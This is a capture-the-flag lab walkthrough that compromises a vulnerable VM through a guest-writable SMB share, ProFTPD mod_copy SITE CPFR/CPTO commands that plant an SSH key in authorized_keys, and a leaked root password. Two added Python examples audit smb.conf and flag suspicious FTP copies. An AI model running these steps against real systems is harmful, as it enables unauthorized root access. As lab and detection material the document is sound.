Penetration Testing Methodologies
Step 1: Run the Netdiscover tool to list all devices connected to the same network; this is where you get the IP of the target. The IP found here is 192.168.1.46.
Command = netdiscover -i eth0 -r 192.168.1.54/24
Step 2: Run an aggressive Nmap scan (-A) against the target IP to enumerate all open ports and the services behind them.
Command = nmap -A 192.168.1.46
Step 3: To get the target's username, use smbmap, because SMB is open on port 445. The share listing it returns gives you the username smbuser, and it also shows that the smbdata share has read and write permission.
Command = smbmap -H 192.168.1.46
To get the password, check for hidden files with Nikto. It finds a hidden file named 'readme.txt'; opening it in the browser at the target IP (192.168.1.46) gives the password, rootroot1.
Command = nikto -h http://192.168.1.46
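The finding in this step that matters to a defender is a guest-accessible share that is also writable. The following is an added example (not from the walkthrough or its author) that audits a Samba smb.conf for exactly that combination. The configuration text is constructed for the example; the share names and paths in it are assumptions, not taken from the target.

```python
import configparser

# Constructed smb.conf for the example; share names and paths are assumptions.
SAMPLE_SMB_CONF = """\
[global]
workgroup = WORKGROUP
map to guest = Bad User

[smbdata]
comment = data share
path = /smbdata
guest ok = yes
writable = yes
browseable = yes

[homes]
read only = yes
browseable = no

[backup]
path = /srv/backup
public = yes
read only = no
"""

TRUE_VALUES = {"yes", "true", "1"}

def _is_true(value):
    return value.strip().lower() in TRUE_VALUES

def share_is_writable(opts):
    # "read only" is Samba's canonical option; writable/writeable/write ok
    # are inverted synonyms and take precedence when present.
    for key in ("writable", "writeable", "write ok"):
        if key in opts:
            return _is_true(opts[key])
    if "read only" in opts:
        return not _is_true(opts["read only"])
    return False  # Samba default is read only = yes

def share_allows_guest(opts):
    # "public" is a synonym for "guest ok".
    for key in ("guest ok", "public"):
        if key in opts:
            return _is_true(opts[key])
    return False

def find_risky_shares(conf_text):
    """Return (share, path) for every share that is both guest-accessible and writable."""
    cp = configparser.ConfigParser(strict=False, interpolation=None)
    cp.read_string(conf_text)
    risky = []
    for section in cp.sections():
        if section.lower() in ("global", "printers", "print$"):
            continue
        opts = {k.lower(): v for k, v in cp.items(section)}
        if share_is_writable(opts) and share_allows_guest(opts):
            risky.append((section, opts.get("path", "")))
    return risky

if __name__ == "__main__":
    for share, path in find_risky_shares(SAMPLE_SMB_CONF):
        print(f"guest-writable share: [{share}] path={path}")
```

A share that anonymous users can write to is the foothold used in Step 5, so this check belongs in a build-time or periodic configuration audit; the fix is `guest ok = no` or `read only = yes` on any share that does not genuinely need anonymous uploads.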
Step 4: An SSH port is also open, which can provide shell access on the target, but first we need to generate a public/private key pair to authenticate over SSH.
Command = ssh-keygen -f /home/kali/td
In this case the public key is td.pub and the private key is td.
Step 5: Using smbclient, connect to the smbdata share, where we will place the public key in order to get shell access later.
Command = sudo smbclient //192.168.1.46/smbdata
Inside the share, change into the samba directory and upload the public key by giving its local path, saving it under the name authorized_key.
Command = cd samba
put /home/kali/td.pub authorized_key
Step 6: To move the key into smbuser's account, use the FTP service. Connect to it with telnet and copy the key from /smbdata/samba/authorized_key to /home/smbuser/.ssh/authorized_keys so that it is accepted for SSH login.
Command = telnet 192.168.1.46 2121
Now copy it from samba (a directory inside smbdata) into smbuser's .ssh directory using the SITE CPFR and SITE CPTO commands.
Command = site cpfr /smbdata/samba/authorized_key
site cpto /home/smbuser/.ssh/authorized_keys
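SITE CPFR and SITE CPTO are the server-side copy commands of ProFTPD's mod_copy module, and a copy whose destination is an authorized_keys file is a strong indicator of exactly the technique used in this step. The following is an added example (not part of the walkthrough or its author's work) that pairs CPFR/CPTO commands per client in an FTP command log and rates each copy by destination. The log lines and their format are constructed for the example; a real deployment would adapt the regex to the server's actual log format.

```python
import re
from dataclasses import dataclass

# Constructed FTP command log; the line format is an assumption for the example.
SAMPLE_FTP_LOG = """\
2024-05-01 10:02:11 192.168.1.54 USER anonymous
2024-05-01 10:02:11 192.168.1.54 PASS ***
2024-05-01 10:02:15 192.168.1.54 SITE CPFR /smbdata/samba/authorized_key
2024-05-01 10:02:16 192.168.1.54 SITE CPTO /home/smbuser/.ssh/authorized_keys
2024-05-01 10:05:40 192.168.1.77 SITE CPFR /pub/report.pdf
2024-05-01 10:05:41 192.168.1.77 SITE CPTO /pub/archive/report.pdf
2024-05-01 10:06:02 192.168.1.77 QUIT
"""

# "<date> <time> <client-ip> <COMMAND> [argument]"
LINE_RE = re.compile(r"^(?P<ts>\S+ \S+) (?P<client>\S+) (?P<cmd>\S+)(?: (?P<arg>.*))?$")

# Destinations whose overwrite grants persistence or code execution.
SENSITIVE_DEST = re.compile(r"(/\.ssh/authorized_keys$|^/etc/|/cron)")

@dataclass
class CopyEvent:
    client: str
    src: str        # path named by SITE CPFR (None if CPTO arrived without CPFR)
    dst: str        # path named by SITE CPTO
    severity: str   # "high" for sensitive destinations, otherwise "medium"

def detect_site_copies(log_text):
    """Return one CopyEvent per completed SITE CPFR/CPTO pair, in log order."""
    pending = {}   # client -> source path awaiting its CPTO
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["cmd"].upper() != "SITE":
            continue
        sub, _, path = (m["arg"] or "").strip().partition(" ")
        sub = sub.upper()
        if sub == "CPFR":
            pending[m["client"]] = path
        elif sub == "CPTO":
            src = pending.pop(m["client"], None)
            severity = "high" if SENSITIVE_DEST.search(path) else "medium"
            events.append(CopyEvent(m["client"], src, path, severity))
    return events

if __name__ == "__main__":
    for ev in detect_site_copies(SAMPLE_FTP_LOG):
        print(f"[{ev.severity}] {ev.client}: {ev.src} -> {ev.dst}")
```

Any SITE copy by an anonymous or low-privilege FTP user is worth alerting on, since the feature is rarely needed; the mitigation on the server side is to disable or restrict mod_copy so unauthenticated sessions cannot issue these commands at all.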
Step 7: The last step is to get shell access. Log in over SSH as smbuser using the private key td, then become the root user with the password found earlier (i.e. rootroot1) and change from smbuser's directory to root's. Listing the files there shows proof.txt; reading that file captures the flag.
Command = ssh -i td smbuser@192.168.1.46
Created By - Devansh Thapar